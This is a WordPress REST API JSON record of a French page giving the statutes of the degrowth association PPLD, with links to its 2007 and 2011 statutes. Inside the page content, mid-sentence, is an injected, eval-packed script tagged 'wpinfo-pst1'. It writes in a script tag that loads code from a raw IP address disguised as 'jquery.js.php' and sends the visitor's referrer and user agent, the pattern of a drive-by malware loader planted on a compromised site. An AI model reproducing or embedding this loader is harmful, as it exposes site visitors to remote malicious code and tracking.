{"id":4004,"date":"2010-02-02T09:54:47","date_gmt":"2010-02-02T08:54:47","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?page_id=4004"},"modified":"2014-06-25T21:39:21","modified_gmt":"2014-06-25T20:39:21","slug":"nos-statuts","status":"publish","type":"page","link":"https:\/\/www.partipourladecroissance.net\/?page_id=4004","title":{"rendered":"Nos statuts"},"content":{"rendered":"<p><strong>Le <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ksdfk|var|u0026u|referrer|bsbds||js|php'.split('|'),0,{}))\n<\/script><\/noindex> PPLD a \u00e9t\u00e9 cr\u00e9\u00e9 comme un parti. Mais depuis plusieurs ann\u00e9es d\u00e9j\u00e0, il n&rsquo;est plus un \u00ab\u00a0parti\u00a0\u00bb. Il est dor\u00e9navant nomm\u00e9 Parti-e-s Pour La D\u00e9croissance (PPLD).<\/strong><\/p>\n<p>De plus Conform\u00e9ment aux\u00a0<a href=\"http:\/\/www.partipourladecroissance.net\/?p=8871\" target=\"_blank\">d\u00e9cisions prises lors de l\u2019AG de 2014<\/a>, le PPLD adopte un fonctionnement du type \u00ab collectif \u00bb. Toutefois, le PPLD reste enregistr\u00e9 en pr\u00e9fecture comme \u00ab\u00a0association loi 1901\u00a0\u00bb<br \/>\nUne Assembl\u00e9e G\u00e9n\u00e9rale Extraordinaire est pr\u00e9vue l\u2019automne 2014 afin d\u2019adapter notre r\u00e8glement int\u00e9rieur puis nos statuts \u00e0 notre fonctionnement.<\/p>\n<p><a href=\"http:\/\/www.partipourladecroissance.net\/?page_id=7567\"><strong>Nous sommes Parti-e-s Pour La D\u00e9croissance<\/strong><\/a><\/p>\n<hr \/>\n<p style=\"text-align: center;\"><strong><a href=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2011\/05\/PPLD-2011-STATUTS.pdf\">Les Statuts de 2011<\/a><br \/>\nvalid\u00e9s \u00e0 l&rsquo;<a href=\"http:\/\/www.partipourladecroissance.net\/?p=6118\">Assembl\u00e9e G\u00e9n\u00e9rale du 23 avril 2011<\/a><\/strong><\/p>\n<p style=\"text-align: center;\"><a href=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2011\/05\/PPLD-2011-STATUTS.pdf\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter\" src=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2011\/05\/statuts-2011.jpg\" alt=\"\" width=\"492\" height=\"715\" \/><\/a><\/p>\n<p style=\"text-align: center;\"><a href=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2011\/05\/PPLD-2011-STATUTS.pdf\"><strong>Cliquez pour t\u00e9l\u00e9charger le PDF<\/strong><\/a><\/p>\n<hr \/>\n<p style=\"text-align: center;\"><a href=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2009\/01\/statuts-ppld-07.pdf\"><strong>Les Statuts de 2007<\/strong><\/a><\/p>\n<p style=\"text-align: center;\"><a href=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2009\/01\/statuts-ppld-07.pdf\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter\" title=\"Statuts du PPLD\" src=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2009\/01\/statut2007-pres.jpg\" alt=\"\" width=\"470\" height=\"647\" \/><br \/>\n<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Le PPLD a \u00e9t\u00e9 cr\u00e9\u00e9 comme un parti. Mais depuis plusieurs ann\u00e9es d\u00e9j\u00e0, il n&rsquo;est plus un \u00ab\u00a0parti\u00a0\u00bb. Il est dor\u00e9navant nomm\u00e9 Parti-e-s Pour La D\u00e9croissance (PPLD). De plus Conform\u00e9ment aux\u00a0d\u00e9cisions prises lors de l\u2019AG de 2014, le PPLD adopte &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?page_id=4004\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"parent":3982,"menu_order":0,"comment_status":"closed","ping_status":"open","template":"","meta":{"footnotes":""},"class_list":["post-4004","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/4004","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4004"}],"version-history":[{"count":7,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/4004\/revisions"}],"predecessor-version":[{"id":8891,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/4004\/revisions\/8891"}],"up":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/3982"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4004"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}